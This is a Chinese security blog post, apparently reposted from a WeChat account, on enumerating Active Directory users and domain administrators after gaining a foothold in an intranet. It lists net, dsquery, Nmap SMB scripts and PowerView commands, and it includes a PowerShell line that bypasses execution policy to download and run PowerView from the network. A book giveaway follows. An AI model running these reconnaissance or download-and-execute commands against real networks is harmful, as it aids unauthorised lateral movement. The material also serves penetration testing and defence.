【文末抽奖】获取域内管理员和用户信息

admin 2022年3月11日01:34:30评论87 views字数 4254阅读14分10秒阅读模式

1.查找所有域用户列表

   向域控制器进行查询

net user /domain

 

获取域内用户详细信息

wmic useraccount get /all


获取到的信息包含用户名描述信息SID,域名,状态等等。


获取存在用户(要在 Active Directory 域管理服务器上运行。

dsquery user
dsquery computer 查找目录中的计算机dsquery contact  查找目录中的联系人dsquery subnet   查找目录中的子网dsquery group    查找目录中的组dsquery ou       查找目录中的组织单位dsquery site     查找目录中的站点dsquery server   查找目录中的AD DC/LDS实例dsquery user     查找目录中的用户dsquery partition查找目录中的分区dsquery *        使用通用的LDAP查找目录中的所有对象

查找本地管理员组用户

net localgroup administrators


2.查询域管理用户组

查找域管理员用户

net group “domain admin”  /domain


查找管理员用户组

net group “Enterprise Admins”  /domain


3.快速定位域管理员

内网渗透的目标是拿到某台特定的用户或计算机的权限,进而拿到特定的数据。

常规定位域管理员的方法

日志:指的是本地机器的管理员日志,可以使用脚本或wevtutil导出查看。
会话:指的是域内每台机器的登录会话,可以使用netsess.exe或powerview等等工具查询 可以匿名查询,不用权限(常用)


常规域管理员定位的工具

如果我们拿到了一台普通用户权限windows计算机,想要在内网中横向移动,需要知道域内用户登录的位置,是否是本地管理员,他的,是否有权访问文件共亨等等。

常用的域管理员定位工具有psloggedon.exe,PVEFindADUser,exe,netsess,exe以及hunerNetview等等。

PowerShell中,常用的工具是PowerView

psloggedon.exe

Windows平台上使用psloggedon.exe,可以查看本地登录的用户和通过本地计算机远程计算机资源登录的用户,原理是通过检查注册表HKEY USERS项key值来查询谁登录过(HKEY_USERS根键包括默认用户的信息(DEFAULT子键)和所有以前登陆的用户的信息.)但是有些功能需要管理员权限才能调用,而且会调用NetSessionEnum API。

一般来说不用加参数 psloggedon.exe //dc 就行

【文末抽奖】获取域内管理员和用户信息

PVEFindADUser.exe(要管理员权限)

2009年放出来的工具。可以查找活动目录用户登录的位置枚举域用户等等。

PVEFindADUser.exe -h 显示帮助信息
-current["username"]列出目标计算机上当前登录的所有用户/显示该用户登录的计算机
其他命令不多说,百度就ok

【文末抽奖】获取域内管理员和用户信息

netview.exe(小部分要管理员权限)

利用 NetSessionEnum 来找寻登陆sessions, 利用NetShareEnum来找寻共享 , 利用 NetWkstaUserEnum 来枚举登陆的用户。调用Api太多不是个好事。

netview.exe 参数
常见参数
-h 查看帮助信息
-d 从当前域中提取主机列表 -d domian 指定提取主机列表的域
-g 在Domain admins组中搜索组名 -g group 指定搜索组名
-c 对找到的共享目录/文件的访问权限进行检查

Nmap的NSE脚本

如果存在域账号/本地账号,我们可以使用Nmapsmb-enum-session.nse脚本来获取远程机器的登录会话

https://nmap.org/nsedoc/scripts/smb-enum-sessions.html


用法示例

nmap --script smb-enum-sessions.nse -p445 <host>sudo nmap -sU -sS --script smb-enum-sessions.nse -p U:137,T:139 <host>


其他nmap脚本

smb-enum-users.nse下载:https ://svn.nmap.org/nmap/scripts/smb-enum-users.nse使用SAMR枚举或LSA暴力破解不同的技术来枚举远程Windows系统上的用户,并提供尽可能多的信息。默认情况下,两者都使用,但是它们具有特定的优点和缺点。最好同时使用两者,但在某些情况下,最好优先选择两者。用法示例nmap --script smb-enum-users.nse -p445 <host>sudo nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 <host>
smb-enum-domains.nse下载https://svn.nmap.org/nmap/scripts/smb-enum-domains.nse尝试枚举系统上的域及其策略。可以获取主机信息,用户,可使用的密码策略的用户等等。用法示例nmap --script smb-enum-domains.nse -p445 <host>sudo nmap -sU -sS --script smb-enum-domains.nse -p U:137,T:139 <host>

Powershell下的脚本

powerView脚本

本地调用 powershell.exe -exec bypass -command "&<import-module 本地脚本路径;invoke-stealithuserhunter>"远程调用 powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1');invoke-stealithuserhunter"域中定位域管理员:Invoke-UserHunter命令,在使用时不需要管理员权限;获取域内所有用户:invoke-stealthuserhunter命令,在使用时不需要管理员权限;隐蔽性高。优先使用其他Get-NetDomain: 获取当前用户所在域的名称Get-NetUser: 获取所有用户的详细信息Get-NetDomainController: 获取所有域控制器的信息Get-NetComputer: 获取域内所有机器的详细信息Get-NetOU: 获取域中的OU信息Get-NetGroup: 获取所有域内组和组成员信息Get-NetFileServer: 根据SPN获取当前域使用的文件服务器信息Get-NetShare: 获取当前域内所有网络共享信息Get-NetSession: 获取指定服务器的会话Get-NetRDPSession: 获取指定服务器的远程连接Get-NetProcess: 获取远程主机的进程Get-UserEvent: 获取指定用户的日志Get-ADObiect: 获取活动目录的对象Get-NetGPO: 获取域内所有的组策略对象Get-DomainPolicy: 获取域默认策略或域控制器策略Invoke-UserHunter: 获取域用户登录的计算机信息及该用户是否有本地管理员权限Invoke-ProcessHunter: 通过查询域内所有的机器进程找到特定用户Invoke-UserEvenHunter: 根据用户日志查询某域用户登录过哪些域机器。


以上转自:黑白天实验室


赠书福利

【文末抽奖】获取域内管理员和用户信息

一:Web渗透攻防实战

本书从网络攻防实战的角度,对Web漏洞扫描利用及防御进行全面系统的研究,由浅入深地介绍了在渗透过程中如何对Web漏洞进行扫描、利用分析及防御,以及在漏洞扫描及利用过程中需要了解和掌握的基础技术。全书共分10章,包括漏洞扫描推荐基础知识、域名信息收集、端口扫描、指纹信息收集与目录扫描、Web;漏洞扫描、Web常见漏洞分析与利用、密码扫描及暴力破解、手工代码审计利用与漏洞挖掘、自动化的漏洞挖掘和利用、Web漏洞扫描安全防御,基本涵盖了Web漏洞攻防技术体系的全部内容。书中还以一些典型漏洞进行扫描利用及实战,通过漏洞扫描利用来还原攻击过程,从而可以针对性地进行防御。

二:Python Web开发从入门到精通

《Python Web开发从入门到精通》分为3部分:第1部分是基础篇,带领初学者实践Python开发环境和掌握基本语法,同时对网络协议、Web客户端技术、数据库建模编程等网络编程基础深入浅出地进行学习;第2部分是框架篇,学习当前*流行的Python Web框架,即Django、Tornado、Flask和Twisted,达到对各种Python网络技术融会贯通的目的;第3部分是实战篇,分别对几种常用WEB框架进行项目实践,利用其各自的特点开发适用于不同场景的网络程序。

三:《元宇宙:图说元宇宙、设计元宇宙(全两册)》

    对于新事物,人们总是充满好奇,提起“元宇宙”也并不例外——总是听说,在元宇宙中,我们可以变身超级英雄拯救世界,可以穿越古代目睹十里长安街的繁华,甚至可以驾驶飞船穿越宇宙,躲避世俗的纷扰……

    这些关于平行世界和未来世界的想象,这些似乎遥不可及的梦,因为元宇宙的到来,都成了可以期待的明天。那么,你是否也跃跃欲试,想尽快了解元宇宙;摩拳擦掌,想着手架构属于自己的世界呢?翻开这本书:《元宇宙:图说元宇宙、设计元宇宙(全两册)》,一切指日可待!

 
赠书规则

     为了感谢大家一直以来的关注与支持,会有四书籍免费赠送【文末抽奖】获取域内管理员和用户信息

     规则如下:

     1.  本文末点‘在看’,不需要转发朋友圈,点个‘在看’就可以。

     2. 私聊文末公众号发送“赠书”即可扫描参与抽奖,注意看是发送暗号“赠书”

     3. 中奖者不满足条件1,视为放弃中奖资格。

     4. 活动截止时间为3月10日 17:00点,到时候还要中奖者及时联系号主发送你的中奖核验二维码、收货地址、姓名、手机号以及想要的书籍,好给您发送书籍哦!24小时内未联系号主视为自动放弃!骗书行为出版社会永久拉黑!


先点“再看”,然后点击下方公众号私聊发送“赠书” 即可马上扫描参与抽奖【文末抽奖】获取域内管理员和用户信息

原文始发于微信公众号(LemonSec):【文末抽奖】获取域内管理员和用户信息

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月11日01:34:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【文末抽奖】获取域内管理员和用户信息https://cn-sec.com/archives/824804.html

发表评论

匿名网友 填写信息